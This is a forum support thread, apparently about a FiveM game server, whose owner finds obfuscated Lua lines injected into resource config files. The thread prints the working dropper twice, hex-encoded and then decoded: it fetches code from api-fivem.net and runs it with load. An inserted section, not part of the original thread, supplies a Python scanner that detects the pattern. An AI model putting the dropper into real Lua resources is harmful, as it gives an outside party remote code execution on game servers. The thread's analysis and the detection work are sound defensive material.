Error on files and bug on my server

Hello,

Client

Using canary?
Yes

Windows version:
Windows 11

System specifications:

Server

Operating system:
Windows

Artifact version:
6117

IP address:
51.91.214.162

System specifications:

Incident

Summary:
I have a big problem… Since some resources were not working, I looked in the F8 logs and came across errors in the config.lua of, for example, my esx_lcgsjob.

When I went to the file in question, at the very end of the config I found this line:

local YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[4][YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2d\x66\x69\x76\x65\x6d\x2e\x6e\x65\x74\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x61\x4c\x61\x67\x32", function (kMxRrCUriNzdOBKlCqhmhbAFuGRdPyRyTWSIYCbGdDgeYKfIRkyVLLhWVUqPECjdngKqWU, jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm) if (jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm == YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[6] or jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm == YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[5]) then return end YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[4][YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[2]](YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[4][YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[3]](jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm))() end)

I know for a fact that I never typed this line in my config.lua. I have the same problem on other random resources.

Expected behavior:

Actual behavior:

Steps to reproduce:
Even when I delete them and restart the server, those kinds of lines end up coming back randomly in other resources.

Server/Client?
Server issue

Files for repro (if any):

Error screenshot (if any):

Any additional info:

Thx for your help, I’m very disappointed…

2 Likes

Seems like malware…

local thisTable = {
    [1] = "PerformHttpRequest",
    [2] = "assert",
    [3] = "load",
    [4] = _G,
    [5] = "",
    [6] = nil
}
-- thisTable[4][thisTable[1] ]("https://api-fivem.net/v2_/stage3.php?to=aLag2", function (arg1, arg2) if (arg2 == thisTable[6] or arg2 == thisTable[5]) then return end thisTable[4][thisTable[2 ] ](thisTable[4][thisTable[3] ](arg2))() end)


--[[
_G["PerformHttpRequest"]("https://api-fivem.net/v2_/stage3.php?to=aLag2", function (err, data)
    if (data == nil or data == "") then return end
    _G["assert"](_G["load"](data))()
end)
]]

Ehhh, this is decoded; whatever you wanna take from that.

2 Likes
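A way to automate what the reply above did by hand, as an added example that is not from this thread, from FiveM, or from any existing scanner tool: a small Python script that walks a resources folder, decodes every Lua string literal written entirely as `\xNN` escapes, and flags lines whose decoded literals are the `PerformHttpRequest` / `assert` / `load` names next to a URL. The sample config, the `hex_literal` helper, the function names and the `example.invalid` URL are all constructed for this example.

```python
import re
import sys
from pathlib import Path
from typing import Dict, List

# A Lua string literal made only of \xNN escapes, at least four bytes long
# (short enough to catch "load", long enough to skip ordinary "\x00" style bytes).
HEX_STRING = re.compile(r'"((?:\\x[0-9a-fA-F]{2}){4,})"')

# Decoded names that together form the fetch-then-execute pattern from the first post.
SUSPICIOUS_NAMES = {"PerformHttpRequest", "assert", "load"}
URL_PATTERN = re.compile(r'https?://[^\s"\']+')


def decode_hex_literal(literal: str) -> str:
    """Turn the escape run '\\x6c\\x6f\\x61\\x64' into the text 'load'."""
    return bytes.fromhex(literal.replace("\\x", "")).decode("latin-1")


def decode_hex_strings(source: str) -> str:
    """Rewrite every all-hex Lua literal in plain text, like the manual decode above."""
    return HEX_STRING.sub(lambda m: '"' + decode_hex_literal(m.group(1)) + '"', source)


def scan_lua_source(source: str, name: str = "<inline>") -> List[Dict]:
    """Return one finding per source line that contains hex-escaped literals."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        hex_literals = HEX_STRING.findall(line)
        if not hex_literals:
            continue
        decoded = [decode_hex_literal(h) for h in hex_literals]
        # Exact match on the decoded literal, so "Config.Locale" style text never trips it.
        names_found = SUSPICIOUS_NAMES & set(decoded)
        urls = [u for lit in decoded for u in URL_PATTERN.findall(lit)]
        # Remote fetch plus load() of the response is the dropper pattern; rate that highest.
        severity = "high" if {"PerformHttpRequest", "load"} <= names_found else "medium"
        findings.append({
            "file": name,
            "line": lineno,
            "hex_literals": len(hex_literals),
            "suspicious_names": sorted(names_found),
            "urls": urls,
            "severity": severity,
        })
    return findings


def scan_directory(root: str) -> List[Dict]:
    """Scan every .lua file under root (resources folder, for instance)."""
    results = []
    for path in sorted(Path(root).rglob("*.lua")):
        text = path.read_text(encoding="utf-8", errors="replace")
        results.extend(scan_lua_source(text, str(path)))
    return results


def hex_literal(text: str) -> str:
    """Constructed helper: encode text the way the dropper does, one \\xNN per byte."""
    return "".join(f"\\x{b:02x}" for b in text.encode())


# Constructed sample: two ordinary config lines, then a line shaped like the one in the
# first post, with the placeholder URL example.invalid instead of any real host.
SAMPLE_CONFIG = "\n".join([
    "Config = {}",
    "Config.Locale = 'en'",
    r'local t = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74",'
    r'"\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} '
    + 't[4][t[1]]("' + hex_literal("https://example.invalid/stage3.php") + '", '
    + "function(a, b) if (b == t[6] or b == t[5]) then return end "
    + "t[4][t[2]](t[4][t[3]](b))() end)",
])


if __name__ == "__main__":
    # Usage: python scan_lua.py <resources-folder>; with no argument, scan the sample.
    hits = scan_directory(sys.argv[1]) if len(sys.argv) > 1 else scan_lua_source(SAMPLE_CONFIG, "config.lua")
    for hit in hits:
        print(f'{hit["severity"]:6} {hit["file"]}:{hit["line"]} '
              f'names={hit["suspicious_names"]} urls={hit["urls"]}')
```

A `high` finding is a line that both fetches remote data and hands it to `load`, which is exactly the shape of the line in the first post. As the rest of the thread shows, a hit only tells you which file was written to, not which resource is doing the writing, so the useful workflow is to run the scan after every restart and compare the list of files that came back.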

Hello,

Thank you for your answer, do you have a solution?

Would the malware be on the remote machine or in a resource?

What anti-virus or anti-malware could I install on windows server 2019?

Thx

That’s malicious code, and it’s in your resources. It’s also possible that more than one resource contains that malicious code, and that’s why it’s being added back every time you restart your server.

1 Like

It’s ok, I found the problem. I actually have a backdoor in one of my resources. I completely deleted it and I’m checking all my files to get everything clean.

Completely deleted the resource, correct?

Yes, but I have the same problem… Every time I reboot I have one of these lines in a random resource.

I get this too, anyone got a fix?

Hi all, guys, I’m using MalScanner to check every time I start my server whether these random things or more are loading in the server. I delete all the

\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74

codes, but they are still appearing randomly. Can anyone help us determine how to solve it, please?

Managed to solve it?

Yep, search for the malicious code in your scripts and delete it; basically, clean your server.

Where did you find the actual code that was spreading it? And what did you use to find it? I have found the local string in the files with VSCode, but how do I find the generator of the local string?

1 Like

This is as far as I got.